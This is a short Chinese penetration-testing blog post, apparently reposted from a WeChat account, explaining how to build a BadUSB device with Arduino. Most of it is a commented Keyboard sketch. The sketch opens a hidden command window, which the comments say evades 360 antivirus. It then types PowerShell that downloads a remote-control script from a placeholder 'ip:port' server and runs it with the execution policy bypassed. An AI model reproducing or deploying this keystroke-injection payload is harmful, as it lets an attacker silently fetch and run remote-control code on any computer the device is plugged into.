0x00 badusb简介
BadUSB是利用USB固件中的固有漏洞,并且杀软无法访问固件区域,通过写入恶意代码来定制一个USB设备,例如U盘。
0x01 编译器选择
https://www.arduino.cc/en/software
![[渗透思路] 简单Badusb制作](http://cn-sec.com/wp-content/uploads/2022/10/1-1666451058.png "[渗透思路] 简单Badusb制作")
0x02 代码分析
void setup() {//只执行一次的函数//开始运行Keyboard.begin();//开始键盘通讯delay(3000);//延时3sKeyboard.press(KEY_LEFT_GUI);//按下win键delay(500);Keyboard.press('r');//r键delay(500);Keyboard.release(KEY_LEFT_GUI);//松开win键Keyboard.release('r'); //松开r键Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法Keyboard.release(KEY_CAPS_LOCK);//按下键盘delay(500);Keyboard.println("CMD /q /d /f:off /v:on /k MODE con: cols=15 lines=1"); //无回显/q(关闭cmd窗口的回显),/d(禁止从注册表执行AutoRun命令),/f:off (禁用文件和目录完成字符),/v:on(使用!作为分隔符,启用延迟的环境变量),MODE con: cols=15 lines=1 (调整行数和列数) ps:开cmd命令窗口为了绕过360检测//Keyboard.println("cmd /T:01 /K "@echo off && mode con:COLS=15 LINES=1""); //有回显delay(500);Keyboard.press(KEY_RETURN); //回车Keyboard.release(KEY_RETURN);delay(2000);Keyboard.println("powershelln");Keyboard.println("$control = new-object system.net.webclient;n");//远程连接命令Keyboard.println("$url= 'http://ip:port/payload.ps1';n"); //远程服务器ps1远控地址Keyboard.println("$file = 'E:\xxxxxx.ps1';n"); //下载到目标存放文件的地址Keyboard.println("$control.downloadfile($url,$file)n"); //利用分段执行绕过防火墙Keyboard.println("powershell.exe -executionpolicy bypass -file E:\xxxxxx.ps1"); //利用powershell的bypass策略执行脚本Keyboard.press(KEY_RETURN);Keyboard.release(KEY_RETURN);Keyboard.press(KEY_CAPS_LOCK);Keyboard.release(KEY_CAPS_LOCK);//恢复小写状态Keyboard.end();//结束键盘通讯}void loop() {//loop函数是会一直重复执行的函数,baduse会检测此函数,所以需要存在,。}
原文始发于微信公众号(追梦信安):[渗透思路] 简单Badusb制作
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论